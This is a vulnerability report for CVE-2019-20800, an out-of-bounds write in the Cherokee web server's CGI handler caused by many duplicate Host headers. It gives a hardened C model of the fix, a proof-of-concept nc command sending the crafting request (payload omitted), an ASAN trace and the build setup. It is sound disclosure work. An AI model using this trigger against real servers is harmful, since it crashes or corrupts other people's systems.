CVE-2019-20800: CGI Handler too many headers · Issue #1224 · cherokee/webserver
In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many “Host: 127.0.0.1” headers.
struct cherokee_handler_cgi_t (handler_cgi.h) contains a fixed-size array (char *envp[ENV_VAR_NUM]) for environment variables. Sending a request with many headers increments int envp_last past ENV_VAR_NUM, so the store at line 310 writes outside the array (the ASAN report below shows a WRITE access).
handler_cgi.c:
310 cgi->envp[cgi->envp_last] = entry;
311 cgi->envp_last++;
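The fix a practitioner would want at that spot is a bounds check before the store. The following is an added model of the pattern, not Cherokee's code: the struct, constant name and the two lines from the report are mirrored, but ENV_VAR_NUM is set to a small assumed value, the function name `add_env_pair` and the `ret_t` enum are simplifications, and `add_many_hosts` is a hypothetical driver that feeds duplicate Host headers the way the PoC request does.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of the pattern at handler_cgi.c:310, not Cherokee's own code: a
 * fixed-size envp[] plus an index the original bumps with no bounds check.
 * ENV_VAR_NUM is set small here (assumption) so the limit is easy to hit;
 * the real constant lives in handler_cgi.h. */
#define ENV_VAR_NUM 8

typedef enum { ret_ok = 0, ret_error = -1 } ret_t;

typedef struct {
    char *envp[ENV_VAR_NUM];
    int   envp_last;
} cgi_env_t;

/* Hardened add: refuse the entry when the array is full instead of writing
 * past it.  One slot is reserved for the NULL terminator execve() expects,
 * so at most ENV_VAR_NUM - 1 entries are stored. */
ret_t add_env_pair(cgi_env_t *cgi, const char *name, const char *val)
{
    size_t len = strlen(name) + 1 + strlen(val) + 1;
    char  *entry;

    if (cgi->envp_last >= ENV_VAR_NUM - 1)
        return ret_error;               /* would write past envp[] */
    entry = malloc(len);
    if (entry == NULL)
        return ret_error;
    snprintf(entry, len, "%s=%s", name, val);

    cgi->envp[cgi->envp_last] = entry;  /* the two lines from the report, */
    cgi->envp_last++;                   /* now guarded by the check above */
    cgi->envp[cgi->envp_last] = NULL;   /* keep the list terminated */
    return ret_ok;
}

/* Feed n copies of a Host header, as the PoC request does, and return how
 * many were accepted; the rest are rejected rather than written out of bounds. */
int add_many_hosts(cgi_env_t *cgi, int n)
{
    int accepted = 0;
    memset(cgi, 0, sizeof(*cgi));       /* envp_last = 0, envp[] all NULL */
    for (int i = 0; i < n; i++)
        if (add_env_pair(cgi, "HTTP_HOST", "127.0.0.1") == ret_ok)
            accepted++;
    return accepted;
}
```

With the check in place, a request carrying hundreds of duplicate headers fills the array and the surplus is dropped; the server-side decision of whether to reject the whole request instead is a policy choice the model leaves to the caller.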
PoC
echo -n '<base64 of a GET /test10/test.html HTTP/1.1 request carrying many "Host: 127.0.0.1" headers, payload omitted>' | base64 -d | nc 127.0.0.1 80
ASAN
=================================================================
==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
==10864==The signal is caused by a WRITE memory access.
#0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
#1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
#2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
#3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
#4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
#5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
#6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
#7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
#8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
#9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
#10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
#11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
#12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
Thread T7 created by T0 here:
#0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
#1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
#2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
#3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
#4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
#5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
#6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
==10864==ABORTING
Setup:
Ubuntu 18.04 64 bit
source code from github, commit 9a75e65
build command:
ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
- files in webroot: mkdir /var/www/test{1..20}; for i in $(seq 1 20); do echo test > /var/www/test$i/test.html; done
- configuration file cherokee.txt
found by: Mateusz Kocielski, Michał Dardas from LogicalTrust